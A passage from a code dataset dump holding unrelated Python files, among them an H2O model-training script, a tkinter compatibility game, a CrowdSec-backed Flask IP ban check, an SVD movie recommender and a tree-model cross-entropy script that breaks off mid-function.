name?\n # in which case we shouldn't be using it as the users profile name\n # that said, if that really is the case, then user_info['name'] should not be none, and we won't get to this code anyway, so lets leave it in for now\n if user_info.get('name'):\n first_name, last_name = util.split_name(user_info['displayName'])\n\n return first_name, last_name\n\n def login(self, user):\n # log the user, by creating a token, and using it right away\n # warning: possible eventual consistency issue here\n\n auth_token = models.User.create_auth_token(user.key.id())\n\n self._request.auth.unset_session()\n self._request.auth.get_user_by_token(user.key.id(), auth_token)\n\n user.log_login(self._request_obj.remote_addr)\n","sub_path":"src/cc/service/oauth_login.py","file_name":"oauth_login.py","file_ext":"py","file_size_in_byte":6244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"185941977","text":"import os\n\nimport h2o\nfrom h2o.estimators import H2ODeepLearningEstimator\nimport pandas as pd\n\nh2o.init()\n\n\n# Load data\ninsurance = h2o.import_file(\n \"https://s3.amazonaws.com/h2o-public-test-data/smalldata/glm_test/insurance.csv\"\n)\n\n# Set factors\ninsurance[\"offset\"] = insurance[\"Holders\"].log()\ninsurance[\"Group\"] = insurance[\"Group\"].asfactor()\ninsurance[\"Age\"] = insurance[\"Age\"].asfactor()\ninsurance[\"District\"] = insurance[\"District\"].asfactor()\n\n\n# Train model\nmodel = H2ODeepLearningEstimator(\n distribution=\"tweedie\",\n hidden=[1],\n epochs=1000,\n train_samples_per_iteration=-1,\n reproducible=True,\n activation=\"Tanh\",\n single_node_mode=False,\n balance_classes=False,\n force_load_balance=False,\n seed=23123,\n tweedie_power=1.5,\n score_training_samples=0,\n score_validation_samples=0,\n stopping_rounds=0,\n)\n\nmodel.train(x=list(range(3)), y=\"Claims\", training_frame=insurance)\n\n\n# Predict\ninput = {\"District\": [1], \"Group\": \"1-1.5l\", \"Age\": \">35\", \"Holders\": [3582]}\ndf = pd.DataFrame(input)\nhf = h2o.H2OFrame(df)\n\nscore = model.predict(hf).as_data_frame().to_dict()\nprint(score[\"predict\"][0])\n\n# Save model\nmodel_file = h2o.save_model(model, path=\"data\", force=True)\n","sub_path":"algo-dev-demo/h2o-python/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"267573720","text":"from tkinter import *\nfrom tkinter import ttk\nfrom random import *\n\ndef acceuil_afficher():\n tout_effacer()\n\n L_nom.place(x=90,y=140)\n B1.place(x=150,y=250)\n\ndef acceuil_effacer():\n L_nom.place_forget()\n B1.place_forget()\n\n#fenêtre des règles :\n\n\ndef regles_afficher():\n tout_effacer()\n \n L_regles_1.place(x=130, y=20)\n L_regles_2.place(x=20,y=70)\n L_regles_3.place(x=20,y=100)\n L_regles_4.place(x=20,y=120)\n L_regles_5.place(x=190,y=220)\n B2.place(x=150,y=250)\n\ndef regles_effacer():\n L_regles_1.place_forget()\n L_regles_2.place_forget()\n L_regles_3.place_forget()\n L_regles_4.place_forget()\n L_regles_5.place_forget()\n B2.place_forget()\n\ndef tout_effacer():\n acceuil_effacer()\n regles_effacer()\n information_effacer()\n\n#fenêtre d'information :\n\ndef information_afficher():\n tout_effacer()\n\n listeCombo.place(x=20,y=20)\n E_prenom_1.place(x=40,y=100)\n E_prenom_2.place(x=40,y=120)\n B3.place(x=40,y=150)\n\ndef information_effacer():\n listeCombo.place_forget()\n E_prenom_1.place_forget()\n E_prenom_2.place_forget()\n B3.place_forget()\n\n # 
E_prenom_1= Entry()\n\n#support window:\nfenetre = Tk()\nfenetre.title('Jeu de compatibilite')\nfenetre.configure(width=500,height=300,bg='#FFCCCC')\n\n#Elements of the home window\nL_nom= Label(fenetre,text=\"Bienvenue sur le jeu de compatibilité amoureuse\",fg='#CC0033',width=40)\nB1=Button(fenetre,text=\"continuer\",width=20,command=regles_afficher)\n\n#Elements of the rules window\nL_regles_1= Label (fenetre,text=\"Les règles du jeu :\", fg='#CC0033',width=30)\nL_regles_2= Label (fenetre, text=\"Les règles sont simples !\", fg='#CC0033',width=20)\nL_regles_3= Label(fenetre, text=\"Il faut entrer le prénom de deux personnes\", fg='#CC0033', width=34)\nL_regles_4= Label (fenetre,text=\"et leurs signes asstrologiques !\",fg='#CC0033',width=25)\nL_regles_5= Label (fenetre,text=\"à vous de jouer !\",fg='#CC0033',width=15)\nB2= Button(fenetre,text=\"continuer\",width=20,command=information_afficher)\n\n#Elements of the game window\nL_prenom_1= Label (fenetre,text=\"Prénom 1 :\",fg='#CC0033',width=20)\nL_prenom_2= Label (fenetre,text=\"Prénom 2 :\",fg='#CC0033',width=20)\nE_prenom_1= Entry (fenetre,width=30)\nE_prenom_2= Entry (fenetre,width=30)\nB3= Button(fenetre,text=\"continuer\",width=20,command=acceuil_afficher)\nlisteSignes=[\"Gémeaux\",\"Lion\"]\nlisteCombo=ttk.Combobox(fenetre, values=listeSignes)\nacceuil_afficher()\n\nfenetre.mainloop()","sub_path":"Projet_brouillon3.py","file_name":"Projet_brouillon3.py","file_ext":"py","file_size_in_byte":2471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"127672758","text":"\"\"\"EMpy: Electromagnetic Python.\n\nEMpy is a suite of numerical algorithms used in electromagnetism.\n\n\"\"\"\n\n__author__ = 'Lorenzo Bolla'\n\nDOCLINES = __doc__.split('\n')\n\n# ZIP file: python setup.py sdist\n# EXE installer: python setup.py bdist_wininst\n# see http://docs.python.org/dist/dist.html\n\nfrom setuptools import setup, find_packages\nfrom EMpy.version import version\nfrom EMpy.dependencies import dependencies\n\nsetup(\n    name='EMpy',\n    version=version,\n    maintainer='Lorenzo Bolla',\n    maintainer_email='lbolla@gmail.com',\n    description=DOCLINES[0],\n    long_description='\n'.join(DOCLINES[2:]),\n    url='http://lbolla.github.io/EMpy/',\n    download_url='https://github.com/lbolla/EMpy',\n    license='BSD',\n    author='Lorenzo Bolla',\n    author_email='lbolla@gmail.com',\n    platforms=['Windows', 'Linux', 'Solaris', 'Mac OS-X', 'Unix'],\n    packages=find_packages(),\n    package_data={'EMpy': ['tests/*.py', 'doc/*.txt', '*.txt']},\n    # install_requires=dependencies,\n    requires=dependencies,\n    provides=['EMpy'],\n    classifiers=[\n        'Development Status :: 2 - Pre-Alpha',\n        'Environment :: Console',\n        'Intended Audience :: Science/Research',\n        'License :: OSI Approved :: BSD License',\n        'Natural Language :: English',\n        'Programming Language :: Python',\n        'Operating System :: OS Independent',\n        'Topic :: Scientific/Engineering :: Physics',\n    ]\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"124110672","text":"\n\nfrom xai.brain.wordbase.nouns._ravine import _RAVINE\n\n#class header\nclass _RAVINES(_RAVINE, ):\n\tdef __init__(self,): \n\t\t_RAVINE.__init__(self)\n\t\tself.name = \"RAVINES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"ravine\"\n\t\tself.jsondata = 
{}\n","sub_path":"xai/brain/wordbase/nouns/_ravines.py","file_name":"_ravines.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"233513689","text":"from pycrowdsec.client import StreamClient\nfrom flask import Flask\nfrom flask import request, abort\n\nc = StreamClient(\n lapi_url=\"http://localhost:8080/\",\n api_key=\"\", # your crowdsec LAPI bouncer key goes here\n interval=5,\n scopes=\"\",\n)\nc.run()\n\napp = Flask(__name__)\n\n\n@app.before_request\ndef check_in_ban_list():\n action = c.cache.get(request.remote_addr)\n if not action:\n return\n if action == \"ban\":\n return \"You have been banned\"\n\n if action == \"captcha\":\n return \"You have captcha\"\n\n\n@app.route(\"/\")\ndef hello_world():\n abort(403)\n # return \"

Hello, World!

\"\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\")\n","sub_path":"examples/flask/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"213675747","text":"from lagom.core.multiprocessing import BaseIterativeMaster\n\n\nclass BaseESMaster(BaseIterativeMaster):\n \"\"\"\n Base class for master of parallelized evolution strategies (ES). \n \n It internally defines an ES algorithm. \n In each generation, it distributes all sampled solution candidates, each for one worker,\n to compute a list of object function values and then update the ES. \n \n For more details about how master class works, please refer\n to the documentation of the class, BaseIterativeMaster. \n \n All inherited subclasses should at least implement the following function:\n 1. make_es(self)\n 2. _process_es_result(self, result)\n \"\"\"\n def __init__(self,\n num_iteration, \n worker_class, \n num_worker,\n init_seed=0, \n daemonic_worker=None):\n super().__init__(num_iteration=num_iteration, \n worker_class=worker_class, \n num_worker=num_worker,\n init_seed=init_seed, \n daemonic_worker=daemonic_worker)\n # Create ES solver\n self.es = self.make_es()\n # It is better to force popsize to be number of workers\n assert self.es.popsize == self.num_worker\n \n def make_es(self):\n \"\"\"\n User-defined function to create an ES algorithm. \n \n Returns:\n es (BaseES): An instantiated object of an ES class. \n \n Examples:\n cmaes = CMAES(mu0=[3]*100, \n std0=0.5, \n popsize=12)\n return cmaes\n \"\"\"\n raise NotImplementedError\n\n def make_tasks(self, iteration):\n # ES samples new candidate solutions\n solutions = self.es.ask()\n \n # Record iteration number, for logging in _process_workers_result()\n # And it also keeps API untouched for assign_tasks() in non-iterative Master class\n self.generation = iteration\n \n return solutions\n \n def _process_workers_result(self, tasks, workers_result):\n # Rename, in ES context, the task is to evalute the solution candidate\n solutions = tasks\n \n # Unpack function values from workers results, [solution_id, function_value]\n # Note that the workers result already sorted ascendingly with respect to task ID\n function_values = [result[1] for result in workers_result]\n \n # Update ES\n self.es.tell(solutions, function_values)\n \n # Obtain results from ES\n result = self.es.result\n \n # Process the ES result\n self._process_es_result(result)\n \n def _process_es_result(self, result):\n \"\"\"\n User-defined function to process the result from ES. \n \n Note that the user can use the class memeber `self.generation` which indicate the index of\n the current generation, it is automatically incremented each time when sample a set of\n solution candidates. \n \n Args:\n result (dict): A dictionary of result returned from es.result. 
\n \n Examples:\n best_f_val = result['best_f_val']\n if self.generation == 0 or (self.generation+1) % 100 == 0:\n print(f'Best function value at generation {self.generation+1}: {best_f_val}')\n \"\"\"\n raise NotImplementedError\n","sub_path":"lagom/core/es/base_es_master.py","file_name":"base_es_master.py","file_ext":"py","file_size_in_byte":3483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"209208842","text":"import pandas as pd\nimport numpy as np\nfrom scipy.sparse.linalg import svds\nfrom flask_caching import Cache\nimport logging\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n# cache = Cache()\n\nclass SVDEngine:\n def __init__(self, ratingsDF):\n\n logger.info(\"Initializing SVDEngine....\")\n\n ratings = ratingsDF.pivot(index = 'userId', columns ='movieId', values = 'rating').fillna(0)\n self.allPredictions = self.getPredictionsAll(ratings)\n\n # @cache.cached(timeout = 10, key_prefix='getPredictionsAll')\n def getPredictionsAll(self,ratings):\n R = ratings.values #.as_matrix()\n user_ratings_mean = np.mean(R, axis = 1)\n Ratings_demeaned = R - user_ratings_mean.reshape(-1, 1)\n U, sigma, Vt = svds(Ratings_demeaned, k = 50)\n sigma = np.diag(sigma)\n\n allPred = np.dot(np.dot(U, sigma), Vt) + user_ratings_mean.reshape(-1, 1)\n return pd.DataFrame(allPred, columns = ratings.columns)\n\n def recommend_movies(self, userID, movies, original_ratings, num_recommendations=10):\n\n logger.info(\"Getting top 10 Recommendation....\")\n \n # # Get and sort the user's predictions\n # user_row_number = userID - 1 # User ID starts at 1, not 0\n # sorted_user_predictions = self.allPredictions.iloc[user_row_number].sort_values(ascending=False) # User ID starts at 1\n \n # # Get the user's data and merge in the movie information.\n # user_data = original_ratings[original_ratings.userId == (userID)]\n # user_full = (user_data.merge(movies, how = 'left', left_on = 'movieId', right_on = 'movieId').\n # sort_values(['rating'], ascending=False)\n # )\n\n # # Recommend the highest predicted rating movies that the user hasn't seen yet.\n # recommendations = (movies[~movies['movieId'].isin(user_full['movieId'])].\n # merge(pd.DataFrame(sorted_user_predictions).reset_index(), how = 'left',\n # left_on = 'movieId',\n # right_on = 'movieId').\n # rename(columns = {user_row_number: 'Predictions'}).\n # sort_values('Predictions', ascending = False).\n # iloc[:num_recommendations, :-1]\n # )\n # recommendations = recommendations.head(10)\n # recomList = []\n # for index, row in recommendations.iterrows():\n # recomList.append({\"movieID\" : row['movieId'],\"Title\" : row['title'],\"Genre\" : row['genres']})\n \n # return recomList\n\n recommendations = self.getPredictions(userID, movies, original_ratings).head(10)\n recomList = []\n for index, row in recommendations.iterrows():\n recomList.append({\"movieID\" : row['movieId'],\"Title\" : row['title'],\"Genre\" : row['genres']})\n \n return recomList\n \n \n def getRating(self, model, userID, movieID):\n rating = model.predict(userID, movieID)\n return {\"rating\" : rating.est}\n\n # def getRating(self, userID, movieID, movies, original_ratings):\n # rating = self.getPredictions(userID, movies, original_ratings)\n # return {\"rating\" : rating[rating['movieId'] == movieID]['Predictions'].to_list()[0]}\n\n def getPredictions(self, userID, movies, original_ratings):\n # Get and sort the user's predictions\n user_row_number = userID - 1 # User ID starts at 1, not 0\n 
sorted_user_predictions = self.allPredictions.iloc[user_row_number].sort_values(ascending=False) # User ID starts at 1\n        \n        # Get the user's data and merge in the movie information.\n        user_data = original_ratings[original_ratings.userId == (userID)]\n        user_full = (user_data.merge(movies, how = 'left', left_on = 'movieId', right_on = 'movieId').\n                     sort_values(['rating'], ascending=False)\n                 )\n\n        # Recommend the highest predicted rating movies that the user hasn't seen yet.\n        predictions = (movies[~movies['movieId'].isin(user_full['movieId'])].\n         merge(pd.DataFrame(sorted_user_predictions).reset_index(), how = 'left',\n               left_on = 'movieId',\n               right_on = 'movieId').\n         rename(columns = {user_row_number: 'Predictions'}).\n         sort_values('Predictions', ascending = False))\n        \n        return predictions\n\n    def get_topN(self, model, userID, config):\n        \n        logger.info(\"Retrieving Top 10 Movie Recommendation....\")\n\n        unique_ids = config.movieLensDF['itemID'].unique()\n        \n        # get the list of the ids that the userid 1001 has rated\n        iids = config.movieLensDF.loc[config.movieLensDF['userID']==userID, 'itemID']\n        \n        # remove the rated movies for the recommendations\n        movies_to_predict = np.setdiff1d(unique_ids,iids)\n        \n        my_recs = []\n        for iid in movies_to_predict:\n            my_recs.append((iid, model.predict(uid=userID,iid=iid).est))\n\n        rawDF = pd.DataFrame(my_recs, columns=['iid', 'predictions']).sort_values('predictions', ascending=False).head(10)['iid']\n        return rawDF.tolist()","sub_path":"svdEngine.py","file_name":"svdEngine.py","file_ext":"py","file_size_in_byte":5164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"3780627","text":"import numpy as np\nimport networkx as nx\nimport matplotlib.pyplot as plt\nimport random as rd\n\ndef abre_matriz(arquivo):\n    A = np.loadtxt(arquivo)\n    G = nx.from_numpy_matrix(A)\n    return G\n\ndef cria_labels(G,arquivo):\n    B = open(\"ha30_name.txt\", 'r')\n    Cidades = []\n    for linha in B:\n        linha = linha.strip(\"\n\")\n        Cidades.append(linha)\n    for v in G.nodes():\n        G.nodes[v]['label'] = Cidades[v]\n    return nx.get_node_attributes(G,'label')\n\ndef plot(nome,titulo,nome_arquivo):\n    plt.figure(1, figsize=(18, 12)) \n    pos=nx.spring_layout(nome) \n    plt.axis('off')\n    nx.draw_networkx(nome,pos)\n    nx.draw_networkx_edges(nome,pos,width=0.4)\n    nx.draw_networkx_nodes(nome,pos,node_size=500)\n    plt.title(titulo, size=20)\n    arquivo = nome_arquivo + \".png\"\n    plt.savefig(arquivo)\n    plt.show()\n\ndef raiz(G):\n    rd.seed(None)\n    return rd.randint(0,G.number_of_nodes())","sub_path":"Projeto4/Funcoes_problema4.py","file_name":"Funcoes_problema4.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"25581946","text":"\r\n#########################\r\n##\r\n#########################\r\n\r\n# Open the file.\r\nsIn = \"./st01.Python기초/py31파일처리/file/data.csv\"\r\nf = open(sIn, \"r\")\r\n\r\n# Process each line in the file.\r\nfor line in f.readlines():\r\n\r\n    # Strip the whitespace characters.\r\n    line = line.strip()\r\n\r\n    # Print the line.\r\n    print(line)\r\n\r\n    # Split the line by commas.\r\n    parts = line.split(\",\")\r\n\r\n    # Print each field of the line.\r\n    for part in parts:\r\n        print(\" \", part)\r\n","sub_path":"st01.Python기초/py31파일처리/py31_11_csv.py","file_name":"py31_11_csv.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} 
+{"seq_id":"95841424","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 31 21:26:43 2020\ninstead of marginal, we get the sufficiet statistics from P\nThis version we have evidences\n\nuse the common format to update derivative\n\n\"\"\"\n\n# optimization problem with chow-liu tree\nimport numpy as np\nfrom scipy.optimize import minimize\n#from scipy.optimize import Bounds # define the bound\n#from scipy import optimize\n\nfrom CLT_class import CLT\nfrom Util import *\nimport JT\nfrom MIXTURE_CLT import MIXTURE_CLT, load_mt\n\nimport sys\nimport time\nimport copy\n\nimport util_opt\nimport utilM\n\n\n\n\n\ndef compute_cross_entropy_mt_sampling_evid(Q, samples, evid_list):\n LL_Q = Q.getWeights(samples)\n #print ('P:', np.sum(LL_P))\n #print ('Q:', np.sum(LL_Q))\n #print (LL_P.shape)\n #approx_cross_entropy = np.sum(np.exp(LL_P)*LL_Q)\n #approx_cross_entropy = np.sum((LL_P - LL_Q))\n \n cond_cpt_evid = Q.instantiation(evid_list)\n evid_prob = utilM.ve_tree_bin(Q.topo_order, Q.parents, cond_cpt_evid) \n \n #print (np.sum(LL_Q)/samples.shape[0])\n #print (evid_prob)\n\n approx_cross_entropy = np.sum(LL_Q)/samples.shape[0] - np.log(evid_prob)\n return approx_cross_entropy \n\n\n\n'''\nReplace cpt with random numbers\n'''\ndef pertub_model(model, model_type='clt', percent=0.1):\n \n \n if model_type=='clt':\n topo_order = model.topo_order\n #parents = model.parents\n updated_cpt = np.copy(model.cond_cpt)\n peturb_no = int(np.round(topo_order.shape[0]* percent))\n #print (peturb_no)\n #rand_number = np.random.randint(topo_order.shape[0], size=peturb_no)\n rand_number = np.random.choice(topo_order.shape[0], size=peturb_no, replace=False)\n \n \n #rand_number[0] = 0\n #print ('rand_number',rand_number)\n \n rand_decimal = np.random.rand(peturb_no, 2, 2)\n \n #print (rand_decimal)\n #print (np.sum(rand_decimal, axis = 1))\n\n \n # make a valid cpt\n norm_const = np.sum(rand_decimal, axis = 1)\n \n rand_decimal[:,:,0] = rand_decimal[:,:,0]/norm_const[:,0, np.newaxis]\n rand_decimal[:,:,1] = rand_decimal[:,:,1]/norm_const[:,1, np.newaxis]\n \n #print (rand_decimal)\n #print (updated_cpt)\n root = topo_order[0]\n if root in rand_number:\n sum_val = rand_decimal[0,0,0] + rand_decimal[0,1,1] \n rand_decimal[0,0,0] = rand_decimal[0,0,1] = rand_decimal[0,0,0]/sum_val\n rand_decimal[0,1,0] = rand_decimal[0,1,1] = rand_decimal[0,1,1]/sum_val\n \n \n #print (rand_decimal)\n\n #updated_cpt[rand_number,:,:] = 0.5\n updated_cpt[rand_number,:,:] = rand_decimal\n #print (updated_cpt[rand_number])\n \n return updated_cpt\n\n#\"\"\"\n#using theta_{\\bar{b}|a} = 1-theta_{b|a}\n#Cleaned all the commented code based on version 0704\n#\"\"\"\n#\n#def get_single_var_marginals(topo_order, parents, cond_cpt):\n# # get marginals:\n# marginals= np.zeros((topo_order.shape[0],2))\n# #marginal_R[topo_order[0]] = theta[0,:,0]\n# marginals[topo_order[0]] = cond_cpt[0,:,0]\n# for k in range (1,topo_order.shape[0]):\n# c = topo_order[k]\n# p = parents[c]\n# marginals[c] = np.einsum('ij,j->i',cond_cpt[k], marginals[p])\n# \n# return marginals\n#\n#\n## ordered by topo order\n#def get_edge_marginals(topo_order, parents, cond_cpt, single_marginal):\n# \n# # edge_marginals ordered by topo order\n# edge_marginals = np.zeros_like(cond_cpt)\n# edge_marginals[0,0,0] = cond_cpt[0,0,0]\n# edge_marginals[0,1,1] = cond_cpt[0,1,1]\n# \n# parents_order = parents[topo_order]\n# topo_marginals = single_marginal[parents_order[1:]] # the parent marignals, ordered by topo_order \n# \n# edge_marginals[1:] = 
np.einsum('ijk,ik->ijk',cond_cpt[1:], topo_marginals)\n#\n# return edge_marginals\n'''\n# compute P(x|e)log(R(x|e))\n#\n'''\ndef cross_entropy_evid(P, R, evid_list, non_evid_var):\n cross_entropy = 0\n \n total_n_var = len(evid_list)+non_evid_var.shape[0] #evid+non-evid\n \n # assume P is a tree \n jt_P = JT.JunctionTree()\n jt_P.learn_structure(P.topo_order, P.parents, P.cond_cpt)\n\n \n P_xy_evid = JT.get_marginal_JT(jt_P, evid_list, non_evid_var)\n #print (P_xy_evid.shape)\n #p_xy_norm = Util.normalize2d(p_xy)\n P_x_evid = np.zeros((non_evid_var.shape[0], 2))\n #p_xy = mt_R.clt_list[c].inference(mt_R.clt_list[c].cond_cpt, ids)\n \n P_x_evid[:,0] = P_xy_evid[0,:,0,0] + P_xy_evid[0,:,1,0]\n P_x_evid[:,1] = P_xy_evid[0,:,0,1] + P_xy_evid[0,:,1,1] \n P_x_evid[0,0] = P_xy_evid[1,0,0,0] + P_xy_evid[1,0,1,0]\n P_x_evid[0,1] = P_xy_evid[1,0,0,1] + P_xy_evid[1,0,1,1]\n \n # Probablity of evidence according to P\n P_e = np.sum(P_x_evid[0,:])\n #print (P_xy_evid)\n #print (P_x_evid)\n #print (np.sum(P_x_evid, axis = 1))\n #print (P_e)\n \n \n # Probablity of evidence according to R\n cond_cpt_e = R.instantiation(evid_list)\n R_e = utilM.ve_tree_bin(R.topo_order, R.parents, cond_cpt_e)\n #print(R_e)\n \n \n # mark which variable is evidence\n evid_flag = np.full(total_n_var,-1) #-1 means non evidence\n evid_arr = np.asarray(evid_list)\n evid_flag[evid_arr[:,0]] = evid_arr[:,1] \n #print (evid_flag)\n \n \n P_xy_evid_full = np.zeros((total_n_var, total_n_var, 2,2))\n #print (P_xy_evid_full[non_evid_var[:,None],non_evid_var].shape)\n P_xy_evid_full[non_evid_var[:,None],non_evid_var] = P_xy_evid\n P_x_evid_full = np.zeros((total_n_var, 2))\n P_x_evid_full[non_evid_var,:] = P_x_evid\n \n #print (P_xy_evid_full)\n #print (P_xy_evid)\n \n # root is the special case\n# for i in range (1, R.topo_order.shape[0]):\n# cld = R.topo_order[i]\n# par = R.parents[cld]\n# \n# ind_c = np.where(non_evid_var==cld)[0]\n# ind_p = np.where(non_evid_var==par)[0]\n# val_c = evid_flag[cld]\n# val_p = evid_flag[par]\n# print (ind_c, ind_p)\n# # both cld and par are not evid\n# if val_c ==-1 and val_p ==-1:\n# cross_entropy += np.sum(P_xy_evid[ind_c, ind_p] * np.log(cond_cpt_e[i]))\n# # cld is evidence \n# elif val_c !=-1 and val_p ==-1:\n# cross_entropy += np.sum(P_x_evid[ind_c] * np.log(cond_cpt_e[i,val_c,:]))\n# # par is evidence \n# elif val_c ==-1 and val_p !=-1:\n# cross_entropy += np.sum(P_x_evid[ind_p] * np.log(cond_cpt_e[i,:,val_p]))\n# # else both cld and par are evidence\n# else:\n# cross_entropy += P_e * np.log(cond_cpt_e[i,val_c,val_p])\n# \n# \n# print ('cross entropy: ', cross_entropy) \n \n# cross_entropy = 0\n # root is the special case\n for i in range (1, R.topo_order.shape[0]):\n cld = R.topo_order[i]\n par = R.parents[cld]\n \n val_c = evid_flag[cld]\n val_p = evid_flag[par]\n # both cld and par are not evid\n if val_c ==-1 and val_p ==-1:\n cross_entropy += np.sum(P_xy_evid_full[cld, par] * np.log(cond_cpt_e[i]))\n # cld is evidence \n elif val_c !=-1 and val_p ==-1:\n cross_entropy += np.sum(P_x_evid_full[cld] * np.log(cond_cpt_e[i,val_c,:]))\n # par is evidence \n elif val_c ==-1 and val_p !=-1:\n cross_entropy += np.sum(P_x_evid_full[par] * np.log(cond_cpt_e[i,:,val_p]))\n # else both cld and par are evidence\n else:\n cross_entropy += P_e * np.log(cond_cpt_e[i,val_c,val_p])\n \n # root\n R_root = R.topo_order[0]\n val_root = evid_flag[R_root]\n # not evid\n if val_root == -1:\n R_root_marginal = np.array([cond_cpt_e[0,0,0], cond_cpt_e[0,1,1]])\n cross_entropy += np.sum(P_x_evid_full[R_root]* 
np.log(R_root_marginal))\n else:\n cross_entropy += P_e * np.log(cond_cpt_e[i,val_root,val_root])\n \n \n print ('cross entropy: ', cross_entropy) \n \n cross_entropy -= P_e * np.log(R_e)\n \n print ('cross entropy: ', cross_entropy)\n\n \n return cross_entropy\n\n#'''\n## compute P(x|e)log(R(x|e)), when marginal from P is given\n##\n#'''\n#def cross_entropy_evid_marginal(P_xy_evid_full, P_x_evid_full, R, evid_list, non_evid_var):\n# cross_entropy = 0\n# \n## total_n_var = len(evid_list)+non_evid_var.shape[0] #evid+non-evid\n## \n## # assume P is a tree \n## jt_P = JT.JunctionTree()\n## jt_P.learn_structure(P.topo_order, P.parents, P.cond_cpt)\n##\n## \n## P_xy_evid = JT.get_marginal_JT(jt_P, evid_list, non_evid_var)\n## #print (P_xy_evid.shape)\n## #p_xy_norm = Util.normalize2d(p_xy)\n## P_x_evid = np.zeros((non_evid_var.shape[0], 2))\n## #p_xy = mt_R.clt_list[c].inference(mt_R.clt_list[c].cond_cpt, ids)\n## \n## P_x_evid[:,0] = P_xy_evid[0,:,0,0] + P_xy_evid[0,:,1,0]\n## P_x_evid[:,1] = P_xy_evid[0,:,0,1] + P_xy_evid[0,:,1,1] \n## P_x_evid[0,0] = P_xy_evid[1,0,0,0] + P_xy_evid[1,0,1,0]\n## P_x_evid[0,1] = P_xy_evid[1,0,0,1] + P_xy_evid[1,0,1,1]\n## \n## # Probablity of evidence according to P\n## P_e = np.sum(P_x_evid[0,:])\n## #print (P_xy_evid)\n## #print (P_x_evid)\n## #print (np.sum(P_x_evid, axis = 1))\n## #print (P_e)\n## \n## \n# # Probablity of evidence according to R\n# cond_cpt_e = R.instantiation(evid_list)\n# R_e = utilM.ve_tree_bin(R.topo_order, R.parents, cond_cpt_e)\n# #print(R_e)\n## \n## \n## # mark which variable is evidence\n## evid_flag = np.full(total_n_var,-1) #-1 means non evidence\n## evid_arr = np.asarray(evid_list)\n## evid_flag[evid_arr[:,0]] = evid_arr[:,1] \n## #print (evid_flag)\n## \n## \n## P_xy_evid_full = np.zeros((total_n_var, total_n_var, 2,2))\n## #print (P_xy_evid_full[non_evid_var[:,None],non_evid_var].shape)\n## P_xy_evid_full[non_evid_var[:,None],non_evid_var] = P_xy_evid\n## P_x_evid_full = np.zeros((total_n_var, 2))\n## P_x_evid_full[non_evid_var,:] = P_x_evid\n## \n## #print (P_xy_evid_full)\n## #print (P_xy_evid)\n## \n## # root is the special case\n### for i in range (1, R.topo_order.shape[0]):\n### cld = R.topo_order[i]\n### par = R.parents[cld]\n### \n### ind_c = np.where(non_evid_var==cld)[0]\n### ind_p = np.where(non_evid_var==par)[0]\n### val_c = evid_flag[cld]\n### val_p = evid_flag[par]\n### print (ind_c, ind_p)\n### # both cld and par are not evid\n### if val_c ==-1 and val_p ==-1:\n### cross_entropy += np.sum(P_xy_evid[ind_c, ind_p] * np.log(cond_cpt_e[i]))\n### # cld is evidence \n### elif val_c !=-1 and val_p ==-1:\n### cross_entropy += np.sum(P_x_evid[ind_c] * np.log(cond_cpt_e[i,val_c,:]))\n### # par is evidence \n### elif val_c ==-1 and val_p !=-1:\n### cross_entropy += np.sum(P_x_evid[ind_p] * np.log(cond_cpt_e[i,:,val_p]))\n### # else both cld and par are evidence\n### else:\n### cross_entropy += P_e * np.log(cond_cpt_e[i,val_c,val_p])\n### \n### \n### print ('cross entropy: ', cross_entropy) \n## \n## cross_entropy = 0\n# # root is the special case\n# for i in range (1, R.topo_order.shape[0]):\n# cld = R.topo_order[i]\n# par = R.parents[cld]\n# \n# val_c = evid_flag[cld]\n# val_p = evid_flag[par]\n# # both cld and par are not evid\n# if val_c ==-1 and val_p ==-1:\n# cross_entropy += np.sum(P_xy_evid_full[cld, par] * np.log(cond_cpt_e[i]))\n# # cld is evidence \n# elif val_c !=-1 and val_p ==-1:\n# cross_entropy += np.sum(P_x_evid_full[cld] * np.log(cond_cpt_e[i,val_c,:]))\n# # par is evidence \n# elif val_c ==-1 and val_p 
!=-1:\n# cross_entropy += np.sum(P_x_evid_full[par] * np.log(cond_cpt_e[i,:,val_p]))\n# # else both cld and par are evidence\n# else:\n# cross_entropy += P_e * np.log(cond_cpt_e[i,val_c,val_p])\n# \n# # root\n# R_root = R.topo_order[0]\n# val_root = evid_flag[R_root]\n# # not evid\n# if val_root == -1:\n# R_root_marginal = np.array([cond_cpt_e[0,0,0], cond_cpt_e[0,1,1]])\n# cross_entropy += np.sum(P_x_evid_full[R_root]* np.log(R_root_marginal))\n# else:\n# cross_entropy += P_e * np.log(cond_cpt_e[i,val_root,val_root])\n# \n# \n# #print ('cross entropy: ', cross_entropy) \n# \n# cross_entropy -= P_e * np.log(R_e)\n# \n# #print ('cross entropy: ', cross_entropy)\n#\n# \n# return cross_entropy\n\n\ndef cross_entropy_evid_parm(R, marginal_P, pair_marginal_P, evid_list, non_evid_var, evid_flag):\n \n cross_entropy = 0\n\n \n cond_cpt_e = R.instantiation(evid_list)\n #cond_cpt_e = np.nan_to_num(cond_cpt_e)\n #R_e = 